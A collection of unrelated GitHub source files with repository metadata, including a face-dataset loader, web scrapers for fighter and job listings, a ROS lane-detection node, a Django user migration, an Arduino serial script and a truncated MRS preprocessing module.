555fdd00b37a194a38488f565a9af20e5d192fb0 | 32209739eaf5b0e5ae245174bc7ca887f3a0e110 | /Introduction to Deep Learning-Week4/lfw_dataset.py | 40eb0933bdf7932d6c293ba8ef6688a461768b28 | [] | no_license | YellowcardD/Introduction-to-Deep-Learning | 43f74c8ae68e72716884428d8a6ce1928333e489 | 3efe971a7b11702407693f03d24ce7c592a9e03a | refs/heads/master | 2020-04-07T05:05:21.190798 | 2018-11-18T16:13:58 | 2018-11-18T16:13:58 | 158,082,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,889 | py | import numpy as np
import os
import cv2
import pandas as pd
import tarfile
import tqdm
ATTRS_NAME = "lfw_attributes.txt"
IMAGE_NAME = "lfw-deepfunneled.gz"
RAW_IMAGES_NAME = "lfw.gz"
def decode_iamge_from_raw_bytes(raw_bytes):
img = cv2.imdecode(np.asarray(bytearray(raw_bytes), dtype=np.uint8), 1)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
return img
def load_lfw_dataset(use_raw=False, dx=80, dy=80, dimx=45, dimy=45):
# read attrs
df_attrs = pd.read_csv(ATTRS_NAME, sep='\t', skiprows=1)
df_attrs = pd.DataFrame(df_attrs.iloc[:, :-1].values, columns=df_attrs.columns[1:])
imgs_with_attrs = set(map(tuple, df_attrs[["person", "imagenum"]].values))
# read photos
all_photos = []
photo_ids = []
with tarfile.open(RAW_IMAGES_NAME if use_raw else IMAGE_NAME) as f:
for m in tqdm.tqdm(f.getmembers()):
if m.isfile() and m.name.endswith(".jpg"):
# prepare image
img = decode_iamge_from_raw_bytes(f.extractfile(m).read())
img = img[dy:-dy, dx:-dx]
img = cv2.resize(img, (dimx, dimy))
# parse person
fname = os.path.split(m.name)[-1]
fname_splitted = fname[:-4].replace('_', ' ').split()
person_id = ' '.join(fname_splitted[:-1])
photo_number = int(fname_splitted[-1])
if (person_id, photo_number) in imgs_with_attrs:
all_photos.append(img)
photo_ids.append({'person': person_id, 'imagenum':photo_number})
photo_ids = pd.DataFrame(photo_ids)
all_photos = np.stack(all_photos).astype('uint8')
# perserve photo_ids order!
all_attrs = photo_ids.merge(df_attrs, on=('person', 'imagenum')).drop(['person', 'imagenum'], axis=1)
return all_photos, all_attrs | [
"noreply@github.com"
] | noreply@github.com |
54a8308182a451fb04d18b813d5defda147a66a0 | 79d7c2ea9133a057bce82c6286013da9752ae5c0 | /Code/Data_Gathering/TapologyFighterScraper.py | 2aa108b31917d1765aee1d9104d8ed0db183083d | [
"MIT"
] | permissive | MrForExample/Weighted-UFC-Fight-Predictor | 6ad9280743a00ce5b3ca7d8e41697b060bb9d3ca | bd5744bfb8fcab4d054a7e038ccc3e854c5fd4fa | refs/heads/main | 2023-01-14T08:08:40.213170 | 2020-11-12T14:39:38 | 2020-11-12T14:39:38 | 312,268,991 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,859 | py | import scrapy
import pandas as pd
self_df = pd.read_csv("../FighterRawData.csv", index_col=0)
miss_fighters_name = self_df[self_df.values == '--'].drop_duplicates(subset=['FIGHTER'])['FIGHTER'].values.tolist()
# Can't scrape all at once due to site spider restriction strategy
miss_fighters_name = miss_fighters_name[1500:]
start_url = "https://www.tapology.com/search?term="
#start_url = "https://www.tapology.com/search?term=Papy+Abedi"
fighter_data_columns = ['FIGHTER', 'HEIGHT', 'WEIGHT', 'REACH', 'STANCE', 'DOB']
all_fighter_df = pd.DataFrame(columns=fighter_data_columns)
class TapologyFighterSpider(scrapy.Spider):
    """Scrapy spider that searches tapology.com for each missing fighter and
    scrapes height/weight/reach/DOB from the matching profile page.

    NOTE(review): `all_fighter_data` is a class-level mutable list, so it is
    shared by all instances of this spider; with the usual single-instance
    scrapy run this works, but confirm before reusing the class.
    """
    name = 'tapology_fighter_spider'
    all_fighter_data = []
    # Throttle to one request at a time with a delay, to avoid the site's
    # anti-spider restrictions (see the comment on the [1500:] slice above).
    custom_settings = {
        'CONCURRENT_REQUESTS': '1',
        'DOWNLOAD_DELAY': 1
    }
    def start_requests(self):
        """Yield one search request per missing fighter, with browser-like headers."""
        url_fighters_name = []
        print(miss_fighters_name)
        print(len(miss_fighters_name))
        for name in miss_fighters_name:
            # Join the name parts with '+' for the URL query string, dropping
            # any empty fragment caused by doubled spaces.
            name_list = name.split(' ')
            if '' in name_list:
                name_list.remove('')
            url_name = name_list[0]
            for i in range(1, len(name_list)):
                url_name += '+' + name_list[i]
            url_fighters_name.append(url_name)
        start_urls = [start_url + url_name for url_name in url_fighters_name]
        #start_urls = [start_url]
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36',
            'Accept': 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            'Accept-Encoding': 'gzip, deflate, sdch',
            'Accept-Language': 'en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4',
        }
        for url in start_urls:
            yield scrapy.http.Request(url, headers=headers)
    def parse(self, response):
        """Scan the search-result leaderboard for a link whose text contains
        every part of the searched name, then follow fighter profile links."""
        fighter_name = response.url.split('=')[-1].split('+')
        info_a_items = response.css("table.fcLeaderboard a")
        for item in info_a_items:
            fighter_name_on_site = item.xpath("text()").extract_first().strip().split(' ')
            if all(n in fighter_name_on_site for n in fighter_name):
                link = item.css("a::attr(href)").get()
                # Only follow links of the form .../fighters/<slug>.
                if link != None and link.split('/')[-2] == 'fighters':
                    new_fighter_data = {}
                    new_fighter_data['FIGHTER'] = ' '.join(fighter_name)
                    self.all_fighter_data.append(new_fighter_data)
                    yield response.follow(link, callback=self.parse_fighter, cb_kwargs=dict(fighter_data=new_fighter_data))
    def parse_fighter(self, response, fighter_data):
        """Fill fighter_data in place from the profile's details list.

        NOTE(review): the fixed indices 4/6/8 assume a specific page layout
        (DOB, weight, height+reach rows) -- verify against the live site.
        """
        info_li_items = response.css("div.details_two_columns ul.clearfix li")
        if len(info_li_items) > 0:
            info_span_items = info_li_items[4].css("span::text").getall()
            if len(info_span_items) > 0:
                fighter_data['DOB'] = info_span_items[-1].strip()
            info_span_items = info_li_items[6].css("span::text").getall()
            if len(info_span_items) > 0:
                fighter_data['WEIGHT'] = info_span_items[-1].strip()
            info_span_items = info_li_items[8].css("span::text").getall()
            if len(info_span_items) > 0:
                fighter_data['HEIGHT'] = info_span_items[0].strip().split(' ')[0]
                fighter_data['REACH'] = info_span_items[1].strip().split(' ')[0]
    def closed(self, reason):
        """On spider shutdown, flush everything scraped to a CSV file."""
        global all_fighter_df
        for fighter_data in self.all_fighter_data:
            #print(fighter_data)
            all_fighter_df = all_fighter_df.append(fighter_data, ignore_index=True)
        all_fighter_df.to_csv('../raw_fighter_details_1500-1784.csv')
| [
"62230687+MrForExample@users.noreply.github.com"
] | 62230687+MrForExample@users.noreply.github.com |
9330cd3f6095c574c0fa566a8d69be0fec19b834 | a62a87ad976e3d35ea7879671190faf950ebaf3b | /scrapys/t.py | 47ae7f7a675a471d9db25b8bb6a431b20fa33406 | [] | no_license | YangXiaoo/Django-web | 144c8c1800d2a67bf8d1d203210aa351d31e8fb3 | 97903f309234fd1421a19a52a083f214172d6c79 | refs/heads/master | 2020-03-24T11:29:20.296017 | 2019-01-20T14:54:16 | 2019-01-20T14:54:16 | 142,687,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,264 | py | # -*- coding: utf-8 -*-
import re
import urllib2
import pandas as pd
#获取原码
def get_content(page):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
'Accept-Language': 'zh-CN,zh;q=0.8'}
url ='http://search.51job.com/list/000000,000000,0000,00,9,99,python,2,'+ str(page)+'.html'
req = urllib2.Request(url,headers=headers)
res = urllib2.urlopen(req)
html = res.read()
re= unicode(html, "gbk").encode("utf8")
return re
def get(html):
    """Extract job rows from a 51job search-result page.

    Returns a list of 7-tuples:
    (job_link, job_title, company, company_link, place, salary, publish_date).
    """
    pattern = (r'class="t1 ">.*? href="(.*?)".*? <a target="_blank" title="(.*?)"'
               r'.*? <span class="t2"><a target="_blank" title="(.*?)" href="(.*?)"'
               r'.*?<span class="t3">(.*?)</span>.*?<span class="t4">(.*?)</span>'
               r'.*? <span class="t5">(.*?)</span>')
    return re.findall(pattern, html, re.S)
def info_get(url):
    """Fetch a 51job detail page and pull out requirement spans and job kinds.

    Returns (based_info, kind): based_info is a list of (css_class, text)
    pairs from the "sp4" requirement spans (experience, education, ...);
    kind is the list of job-category texts. Python 2 code (uses `unicode`).
    """
    request = urllib2.Request(url, headers={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Accept-Language': 'zh-CN,zh;q=0.8',
    })
    # The site serves GBK; normalize to UTF-8 before matching.
    page = unicode(urllib2.urlopen(request).read(), "gbk").encode("utf8")
    based_info = re.findall(r'<span class="sp4"><em class="(.*?)"></em>(.*?)</span>', page, re.S)
    kind = re.findall(r'<span class="el">(.*?)</span>', page, re.S)
    return based_info, kind
def address(url):
    """Fetch a 51job company page and return the address paragraph(s).

    Returns the (possibly empty) list of strings matched after the span in
    the "tBorderTop_box bmsg" contact block. Python 2 code (uses `unicode`).
    """
    request = urllib2.Request(url, headers={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36',
        'Accept-Language': 'zh-CN,zh;q=0.8',
    })
    # The site serves GBK; normalize to UTF-8 before matching.
    page = unicode(urllib2.urlopen(request).read(), "gbk").encode("utf8")
    return re.findall(r'<div class="tBorderTop_box bmsg">.*?</span>(.*?)</p>', page, re.S)
final = []
# Crawl search-result pages (currently only page 1) and, for every job row,
# append a raw line to 51job.txt and a structured dict to `final`.
for j in range(1,2):
    print("正在爬取第"+str(j)+"页数据...")
    try:
        html=get_content(j)
        for i in get(html):
            result = {}
            # Append the tab-separated raw fields to the text dump.
            # (f.close() is redundant inside the `with` block.)
            with open ('51job.txt','a') as f:
                f.write(i[0]+'\t'+i[1]+'\t'+i[2]+'\t'+i[3]+'\t'+i[4]+'\t'+i[5]+'\t'+i[6]+'\n')
                f.close()
            result['info_link'] = i[0]
            info,kind = info_get(i[0])
            # The first two sp4 spans are experience and education, in order.
            count = 1
            for n in info:
                if count == 1:
                    result['experience'] = n[1]
                    count += 1
                elif count == 2:
                    result['educational'] = n[1]
                    count += 1
                else:
                    break
            result['work_type'] = kind[0]
            # NOTE(review): this stores the `address` *function object*; it is
            # overwritten with the real value a few lines below, so this
            # assignment appears to be dead -- confirm before removing.
            result['address'] = address
            result['name'] = i[1]
            result['company'] = i[2]
            result['company_link'] = i[3]
            result['work_place'] = i[4]
            result['salary'] = i[5]
            ad = address(i[3])
            result['address'] = ad
            result['publish_time'] = i[6]
            final.append(result)
    except:
        # NOTE(review): bare except silently drops any page whose scrape
        # fails (network errors, layout changes); consider logging instead.
        pass
df = pd.DataFrame(final)
df.to_csv('51job-data_analysis.csv', mode = 'a',encoding = 'utf8')
| [
"33798487+YangXiaoo@users.noreply.github.com"
] | 33798487+YangXiaoo@users.noreply.github.com |
2c8e692913201e7b86f4e54c67ce0c02757ef65d | 02880a53d16e3ede7c6a9f7d24949f04754dd2ca | /turtlebot_control/src/path_follow_cv.py | 02d09e70b192412ca4216ccccebdf5ad8f0a29d1 | [] | no_license | DodgeBot/ROS | ff33bc90aa28fbbff25fd2ccfba9ef9c082da01f | e714db21260d38fa04989bf8ab766de6428289ec | refs/heads/master | 2021-04-12T08:05:56.383947 | 2017-07-02T22:32:52 | 2017-07-02T22:32:52 | 94,515,113 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,542 | py | #!/usr/bin/python
import os
import sys
import csv
import cv2
import glob
import numpy as np
from ParticleFilter import ParticleFilter
import rospy
import roslib
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import imutils
import numpy as np
import time
# Steering-direction labels (0 = right, 1 = straight, 2 = left).
# NOTE(review): not referenced elsewhere in this module -- presumably consumed
# by other DodgeBot nodes; confirm before removing.
G_LABEL_RIGHT = 0
G_LABEL_STRAIGHT = 1
G_LABEL_LEFT = 2
# Per-frame (left_x_intercept, right_x_intercept) estimates appended by
# PathFollower.img_callback.
intercepts = []
class PathFollower:
    """ROS node that detects the left/right lane markers in each camera frame.

    Subscribes to `image_raw`, runs a Hough-transform based lane detector on
    every frame, smooths the lane x-intercepts and slopes with particle
    filters, draws the estimated lanes, and shows the annotated frame.
    Python 2 code (integer division is relied on when halving image sizes).
    """
    def __init__(self):
        """Wire up the result publisher, the cv_bridge, and the image subscriber."""
        self.image_pub = rospy.Publisher("path_follow_result_image", Image, queue_size=1)
        self.bridge = CvBridge()
        self.image_sub = rospy.Subscriber("image_raw", Image, self.img_callback)
    def img_callback(self, data):
        """Per-frame lane detection callback.

        Pipeline: crop a horizontal band of the frame, grayscale + filter +
        equalize + Canny, probabilistic Hough transform, then vote for the
        most likely left/right lane x-intercepts and slopes, smooth them with
        particle filters, and display the result. Appends the smoothed
        (left, right) intercepts to the module-level `intercepts` list.

        NOTE(review): the four ParticleFilter objects are re-created on every
        callback, so no state survives between frames -- frame-to-frame
        tracking appears to be defeated; confirm whether they should be
        instance attributes. xl_int_q/xl_phs_q/count are also unused here.
        """
        xr_phase = 0
        xl_phase = 0
        try:
            orig_img = self.bridge.imgmsg_to_cv2(data, "bgr8")
        except CvBridgeError as e:
            print(e)
        (rows, cols, channels) = orig_img.shape
        # cv_image = imutils.resize(orig_img, width=min(400, cols))
        xl_int_pf=ParticleFilter(N=1000,x_range=(0,1500),sensor_err=1,par_std=100)
        xl_phs_pf=ParticleFilter(N=1000,x_range=(15,90),sensor_err=0.3,par_std=1)
        xr_int_pf=ParticleFilter(N=1000,x_range=(100,1800),sensor_err=1,par_std=100)
        xr_phs_pf=ParticleFilter(N=1000,x_range=(15,90),sensor_err=0.3,par_std=1)
        #tracking queues
        xl_int_q = [0]*15
        xl_phs_q = [0]*15
        count = 0
        # Scale down the image - Just for better display.
        orig_height,orig_width=orig_img.shape[:2]
        orig_img=cv2.resize(orig_img,(orig_width/2,orig_height/2),interpolation = cv2.INTER_CUBIC)
        orig_height,orig_width=orig_img.shape[:2]
        # Part of the image to be considered for lane detection
        upper_threshold=0.4
        lower_threshold=0.2
        # Copy the part of original image to temporary image for analysis.
        img=orig_img[int(upper_threshold*orig_height):int((1- lower_threshold)*orig_height),:]
        # Convert temp image to GRAY scale
        img=cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
        height,width=img.shape[:2]
        # Image processing to extract better information form images.
        # Adaptive Biateral Filter:
        img = cv2.adaptiveBilateralFilter(img,ksize=(5,5),sigmaSpace=2)
        # Equalize the histogram to account for better contrast in the images.
        img = cv2.equalizeHist(img);
        # Apply Canny Edge Detector to detect the edges in the image.
        bin_img = cv2.Canny(img,30,60,apertureSize = 3)
        #Thresholds for lane detection. Emperical values, detected from trial and error.
        xl_low = int(-1*orig_width) # low threshold for left x_intercept
        xl_high = int(0.8*orig_width) # high threshold for left x_intercept
        xr_low = int(0.2*orig_width) # low threshold for right x_intercept
        xr_high = int(2*orig_width) # high threshold for right x_intercept
        xl_phase_threshold = 15 # Minimum angle for left x_intercept
        xr_phase_threshold = 14 # Minimum angle for right x_intercept
        xl_phase_upper_threshold = 80 # Maximum angle for left x_intercept
        xr_phase_upper_threshold = 80 # Maximum angle for right x_intercept
        # Arrays/Containers for intercept values and phase angles.
        xl_arr = np.zeros(xl_high-xl_low)
        xr_arr = np.zeros(xr_high-xr_low)
        xl_phase_arr = []
        xr_phase_arr = []
        # Intercept Bandwidth: Used to assign weights to neighboring pixels.
        intercept_bandwidth = 6
        # Run Probabilistic Hough Transform to extract line segments from Binary image.
        lines=cv2.HoughLinesP(bin_img,rho=1,theta=np.pi/180,threshold=30,minLineLength=20,maxLineGap=5)
        # Loop for every single line detected by Hough Transform
        # print len(lines[0])
        for x1,y1,x2,y2 in lines[0]:
            if(x1<x2 and y1>y2 and x1 < 0.6*width and x2 > 0.2*width):
                # Left-lane candidate: rises to the right within the left band.
                norm = cv2.norm(float(x1-x2),float(y1-y2))
                phase = cv2.phase(np.array(x2-x1,dtype=np.float32),np.array(y1-y2,dtype=np.float32),angleInDegrees=True)
                if(phase<xl_phase_threshold or phase > xl_phase_upper_threshold or x1 > 0.5 * orig_width): #Filter out the noisy lines
                    continue
                xl = int(x2 - (height+lower_threshold*orig_height-y2)/np.tan(phase*np.pi/180))
                # Show the Hough Lines
                # cv2.line(orig_img,(x1,y1+int(orig_height*upper_threshold)),(x2,y2+int(orig_height*upper_threshold)),(0,0,255),2)
                # If the line segment is a lane, get weights for x-intercepts
                try:
                    for i in range(xl - intercept_bandwidth,xl + intercept_bandwidth):
                        xl_arr[i-xl_low] += (norm**0.5)*y1*(1 - float(abs(i - xl))/(2*intercept_bandwidth))*(phase**2)
                except IndexError:
                    # print "Debug: Left intercept range invalid:", xl
                    continue
                xl_phase_arr.append(phase[0][0])
            elif(x1<x2 and y1<y2 and x2>0.6*width and x1 < 0.8*width):
                # Right-lane candidate: falls to the right within the right band.
                norm = cv2.norm(float(x1-x2),float(y1-y2))
                phase = cv2.phase(np.array(x2-x1,dtype=np.float32),np.array(y2-y1,dtype=np.float32),angleInDegrees=True)
                if(phase<xr_phase_threshold or phase > xr_phase_upper_threshold or x2 < 0.5 * orig_width): #Filter out the noisy lines
                    continue
                xr = int(x1 + (height+lower_threshold*orig_height-y1)/np.tan(phase*np.pi/180))
                # Show the Hough Lines
                # cv2.line(orig_img,(x1,y1+int(orig_height*upper_threshold)),(x2,y2+int(orig_height*upper_threshold)),(0,0,255),2)
                # If the line segment is a lane, get weights for x-intercepts
                try:
                    for i in range(xr - intercept_bandwidth,xr + intercept_bandwidth):
                        xr_arr[i-xr_low] += (norm**0.5)*y2*(1 - float(abs(i - xr))/(2*intercept_bandwidth))*(phase**2)
                except IndexError:
                    # print "Debug: Right intercept range invalid:", xr
                    continue
                xr_phase_arr.append(phase[0][0])
            else:
                pass # Invalid line - Filter out orizontal and other noisy lines.
        # Sort the phase array and get the best estimate for phase angle.
        try:
            xl_phase_arr.sort()
            xl_phase = xl_phase_arr[-1] if (xl_phase_arr[-1] < np.mean(xl_phase_arr) + np.std(xl_phase_arr)) else np.mean(xl_phase_arr) + np.std(xl_phase_arr)
        except IndexError:
            # print "Debug: ", fname + " has no left x_intercept information"
            pass
        try:
            xr_phase_arr.sort()
            xr_phase = xr_phase_arr[-1] if (xr_phase_arr[-1] < np.mean(xr_phase_arr) + np.std(xr_phase_arr)) else np.mean(xr_phase_arr) + np.std(xr_phase_arr)
        except IndexError:
            # print "Debug: ", fname + " has no right x_intercept information"
            pass
        # Get the index of x-intercept (700 is for positive numbers for particle filter.)
        pos_int = np.argmax(xl_arr)+xl_low+700
        # Apply Particle Filter.
        xl_int = xl_int_pf.filterdata(data=pos_int)
        xl_phs = xl_phs_pf.filterdata(data=xl_phase)
        # Draw lines for display
        cv2.line(orig_img,
            (int(xl_int-700), orig_height),
            (int(xl_int-700) + int(orig_height*0.3/np.tan(xl_phs*np.pi/180)),int(0.7*orig_height)),(0,255,255),2)
        # Apply Particle Filter.
        xr_int = xr_int_pf.filterdata(data=np.argmax(xr_arr)+xr_low)
        xr_phs = xr_phs_pf.filterdata(data=xr_phase)
        # Draw lines for display
        cv2.line(orig_img,
            (int(xr_int), orig_height),
            (int(xr_int) - int(orig_height*0.3/np.tan(xr_phs*np.pi/180)),int(0.7*orig_height)),(0,255,255),2)
        # print "Degbug: %5d\t %5d\t %5d\t %5d %s"%(xl_int-700,np.argmax(xl_arr)+xl_low,xr_int,np.argmax(xr_arr)+xr_low,fname)
        fname = "test_frame"
        intercepts.append((xl_int[0]-700, xr_int[0]))
        # Show image
        cv2.imshow('Lane Markers', orig_img)
        key = cv2.waitKey(30)
        if key == 27:
            # ESC pressed in the preview window: tear down and stop the node.
            cv2.destroyAllWindows();
            sys.exit(0)
def main(args):
    """Start the PathFollower ROS node and block until shutdown."""
    rospy.init_node('PathFollower', anonymous=True)
    # Keep a reference so the node's subscriber/publisher stay alive while spinning.
    ic = PathFollower()
    try:
        rospy.spin()
    except KeyboardInterrupt:
        print("shutting down")
    cv2.destroyAllWindows()
if __name__ == '__main__':
    try:
        main(sys.argv)
    except rospy.ROSInterruptException:
        # Raised by rospy on normal shutdown; exiting quietly is intended.
        pass
| [
"fyp16010@gmail.com"
] | fyp16010@gmail.com |
c9d99ec9f87041eb0577f08fd01cab6264d3abd1 | 72a05ac540052e426c88245d3ffe12a1a08de362 | /MME/g/PBR/thumbnail_x256.py | 202f7990098ea972ffc8187f29cd264977677c45 | [] | no_license | pennennennennennenem/pennennennennennenem.github.io | 486c60595a05f76b0879f0511a46b5dd864d6503 | 8bbf8edb36c32fef67874b36e9563826196d21a0 | refs/heads/master | 2022-09-29T07:44:44.397982 | 2022-09-09T02:11:20 | 2022-09-09T02:11:20 | 253,360,771 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | from PIL import Image
import sys
import os
# Load the image named on the command line, forcing RGB so saving as JPEG
# works even for palette/RGBA inputs.
i = Image.open(sys.argv[1]).convert('RGB')
# Bound the width at 256px, scaling the height to keep the aspect ratio.
# Fix: use floor division so the height is an int on Python 3 as well
# (`/` produced a float there; on Python 2 `//` is identical for ints).
i.thumbnail((256, 256 * i.size[1] // i.size[0]))
# Write alongside the input with an "_s" suffix, e.g. photo.png -> photo_s.jpg.
i.save(os.path.splitext(sys.argv[1])[0] + '_s.jpg')
"56704844+pennennennennennenem@users.noreply.github.com"
] | 56704844+pennennennennennenem@users.noreply.github.com |
ad63402027f5c0450e9fb9b04104c95a7de2b965 | 4a8c8bbfb6c1785bb97660020c5e577d887ce4e2 | /account/migrations/0001_initial.py | 6270082a88774730f22c4712ab9b630efc262380 | [] | no_license | Eldiyar0220/Hackstone | 7faf50c49509e8b306df01c3446be40fd87e091f | 2133bc176cd23a4ba7c6ea821a799cd7b2a88e8a | refs/heads/main | 2023-06-05T19:39:44.337879 | 2021-06-27T12:46:07 | 2021-06-27T12:46:07 | 379,862,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,396 | py | # Generated by Django 3.1 on 2021-06-24 08:44
import account.models
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial migration: creates the custom ``MyUser`` model.

    Auto-generated by ``makemigrations`` (Django 3.1). Avoid hand-editing
    the field definitions here; create a follow-up migration instead.
    """
    initial = True
    # Requires django.contrib.auth's migration that widened first_name.
    dependencies = [
        ('auth', '0012_alter_user_first_name_max_length'),
    ]
    operations = [
        migrations.CreateModel(
            name='MyUser',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                ('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
                ('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
                ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
                ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
                # email replaces username as the unique login identifier
                ('email', models.EmailField(max_length=254, unique=True)),
                # accounts start inactive until activated via activation_code
                ('is_active', models.BooleanField(default=False)),
                ('activation_code', models.CharField(blank=True, max_length=50)),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
                ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
            ],
            options={
                'verbose_name': 'user',
                'verbose_name_plural': 'users',
                'abstract': False,
            },
            managers=[
                ('objects', account.models.MyUserManager()),
            ],
        ),
    ]
| [
"Ebolotov904@gmail.com"
] | Ebolotov904@gmail.com |
145365adce5937414e20b7f9ff9e38120c14843d | 776341e5dc617ece09c290afe66311e058fd0144 | /send_to_arduino.py | 5c7e6eaaec42013e7d8779b544a7ffb891248b46 | [] | no_license | deysonali/Project-Lumos | a896ff727d472576ed4a2e8feab29103d7a53812 | b2d368494b04b82da7fa8ab417a85cdda99813e7 | refs/heads/main | 2023-01-14T05:07:27.946089 | 2020-11-23T05:57:39 | 2020-11-23T05:57:39 | 315,214,194 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 940 | py | import serial
import time
# The following line is for serial over GPIO
port = "COM6"  # serial port the Arduino is attached to (Windows-style name)
ard = serial.Serial(port, 9600, timeout=5)
time.sleep(2)  # give the Arduino time to reset after the port opens
i = 0
# Pre-encode the two one-character payloads ("1" and "0") as UTF-8 bytes.
setTemp1 = bytes(str(1), 'utf-8')
setTemp2 = bytes(str(0), 'utf-8')
for i in range(0, 2): # Represents 1 (right) followed by a 0 (left) received from our SVM model results
    # Serial write section: even iteration sends "1", odd iteration sends "0".
    if i % 2 == 0: # if we see a 1
        ard.write(setTemp1)
        print("Python value sent: ")
        print(setTemp1)
        time.sleep(5)
    else: # if we see a 0
        ard.write(setTemp2)
        print("Python value sent: ")
        print(setTemp2)
        time.sleep(5) # with the port open, the response will be buffered
        # so wait a bit longer for response here
    # Serial read section
    # NOTE(review): inWaiting() is the legacy pyserial spelling of in_waiting.
    msg = ard.read(ard.inWaiting()) # read everything in the input buffer
    print("Message from Arduino: ")
    print(msg)
    time.sleep(5)
| [
"noreply@github.com"
] | noreply@github.com |
b857744f18041b979948a7934c4d4b680381dead | 6b9d52ade00538e6a950deffc9342c66edd6cc04 | /zhipin/zhipin/spiders/AreaSpider.py | 1f9514e4270a9f504ed9267ae245203973504728 | [] | no_license | asmaaelkeurti/scrapy | b4354630ded384c724b4802cdad7d98098f455c3 | 77ed01cea149711d6acdd66d994f6b9976073c6f | refs/heads/master | 2020-06-14T01:31:31.226963 | 2019-07-26T02:39:17 | 2019-07-26T02:39:17 | 194,851,756 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,089 | py | import scrapy
from ..items import AreaItem
import pymongo
class AreaSpider(scrapy.Spider):
    """Collects area-level links and names for every district page stored in MongoDB."""

    name = "area_url"
    custom_settings = {
        'DOWNLOAD_DELAY': 20,
        'ITEM_PIPELINES': {'zhipin.pipelines.AreaPipeline': 400},
        'DOWNLOADER_MIDDLEWARES': {'zhipin.middlewares.ZhipinUserAgentMiddleware': 100}
    }

    def start_requests(self):
        """Seed one request per district document found in the zhipin database."""
        connection = pymongo.MongoClient('mongodb://localhost:27017/')
        district_collection = connection['zhipin']['district_items']
        for document in district_collection.find():
            yield scrapy.Request(url=document['district_link'], callback=self.parse)

    def parse(self, response):
        """Pair every area href with its label and emit an AreaItem per real link."""
        anchors = response.xpath('//div[@class="condition-box"]/dl[3]/dd/a/@href').getall()[1:]
        labels = response.xpath('//div[@class="condition-box"]/dl[3]/dd/a/text()').getall()[1:]
        for href, label in zip(anchors, labels):
            # only sufficiently long hrefs are kept (same length filter as before)
            if len(href) > 20:
                yield AreaItem(
                    district_link=response.request.url,
                    area_link=response.urljoin(href),
                    area_name=label)
| [
"asmaaelkeurti@aliyun.com"
] | asmaaelkeurti@aliyun.com |
bd64520533edfc4080a9c62fe2f73533c225df98 | 952a9bc5a54bae037662f3bd5e09aa13780628a2 | /vespa/analysis/block_prep_megalaser.py | d9ee800348907f04ad9ee6a673913aebdecb9e0a | [
"BSD-3-Clause"
] | permissive | bsoher/vespa_py2 | 199964d2ffdc6ed576d6d73e55078ed5bc26c784 | 07cd67de2465607319870a18435da784345198d0 | refs/heads/main | 2023-04-22T04:24:44.270731 | 2021-05-06T01:07:57 | 2021-05-06T01:07:57 | 364,384,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,109 | py | # Python modules
from __future__ import division
# 3rd party modules
import numpy as np
import xml.etree.cElementTree as ElementTree
# Our modules
import vespa.analysis.block_prep_identity as block_prep_identity
import vespa.analysis.chain_prep_megalaser as chain_prep_megalaser
import vespa.analysis.block as block
import vespa.common.util.xml_ as util_xml
import vespa.common.util.misc as util_misc
import vespa.common.constants as common_constants
import vespa.common.mrs_data_raw as mrs_data_raw
from vespa.common.constants import Deflate
class _Settings(object):
    """Tunable parameters for the Megalaser preprocessing block, with XML
    (de)serialization via ``deflate()``/``inflate()``.
    """
    # The XML_VERSION enables us to change the XML output format in the future
    XML_VERSION = "1.0.0"

    def __init__(self, attributes=None):
        """
        Currently there are no input parameters set in this object. This may
        change in the future, or this object may serve as a base class for
        other "raw" types of data objects that need to do a bit of massaging
        of the data as it comes in (e.g. align and sum individual FIDs for
        an SVS data set).

        :param attributes: optional ElementTree node or dict handed straight
            to ``inflate()`` to override the defaults below.
        """
        # general FID conditioning parameters
        self.fid_left_shift = 0
        self.gaussian_apodization = 2.0
        self.global_phase1 = 0.0
        # peak-shift (B0) correction parameters (note the *_b0 naming)
        self.apply_peak_shift = True
        self.reference_peak_center = 2.01
        self.peak_search_width = 0.2
        self.fid_left_shift_b0 = 56
        # zero-order phase correction parameters
        self.apply_phase0 = True
        self.phase0_range_start = 2.2
        self.phase0_range_end = 1.8
